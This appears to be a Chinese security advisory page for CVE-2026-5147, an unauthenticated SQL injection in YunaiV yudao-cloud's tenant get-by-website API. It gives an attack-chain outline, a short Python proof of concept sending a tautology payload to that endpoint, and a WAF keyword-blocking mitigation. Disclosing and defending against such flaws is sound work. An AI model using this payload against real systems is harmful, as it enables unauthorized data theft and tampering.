CVE-2026-5147 CVSS 7.3 高危

CVE-2026-5147 YunaiV yudao-cloud SQL注入漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5147

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

YunaiV yudao-cloud

漏洞概述

YunaiV yudao-cloud 2026.01及之前版本存在SQL注入漏洞。攻击者可通过操纵/admin-api/system/tenant/get-by-website接口中的Website参数，在未授权的情况下远程执行恶意SQL语句。该漏洞可能导致敏感数据泄露、数据篡改或服务中断，且利用代码已公开，风险极高。

技术细节

该漏洞源于YunaiV yudao-cloud在处理/admin-api/system/tenant/get-by-website接口请求时，未对用户传入的Website参数进行严格的过滤或预编译处理，导致攻击者能够注入恶意的SQL语法。由于CVSS向量显示PR:N（无需权限）和UI:N（无需交互），攻击者可直接通过网络向受影响端点发送特制数据包。一旦攻击成功，攻击者可利用数据库的漏洞读取、修改或删除数据（C:L/I:L/A:L），甚至可能获取服务器权限。目前厂商尚未对此披露做出响应。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标运行的是YunaiV yudao-cloud系统，且版本在2026.01或以下。

STEP 2

2. 发送恶意请求

攻击者构造包含SQL注入Payload的请求，发送至/admin-api/system/tenant/get-by-website接口，并操纵Website参数。

STEP 3

3. 执行SQL注入

后端服务器未过滤恶意参数，直接将其拼接到SQL查询中执行。

STEP 4

4. 获取数据或破坏

攻击者利用注入点提取数据库敏感信息（如用户凭证），或进行增删改操作，影响系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL vulnerable endpoint
target_url = "http://example.com/admin-api/system/tenant/get-by-website"

# SQL Injection payload (Example: Boolean-based blind)
payload = {
    "website": "' OR '1'='1'-- "
}

try:
    # Sending the request without authentication
    response = requests.get(target_url, params=payload, timeout=5)

    # Analyze response to confirm vulnerability
    if response.status_code == 200:
        print("[+] Potential vulnerability detected!")
        print("Response:", response.text)
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print("Error:", str(e))

影响范围

YunaiV yudao-cloud <= 2026.01

防御指南

临时缓解措施

建议立即在系统边界（如WAF或反向代理）拦截对/admin-api/system/tenant/get-by-website接口的访问，或者拦截包含SQL关键字（SELECT, UNION, OR, AND, '）的请求参数，直到官方补丁发布并应用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表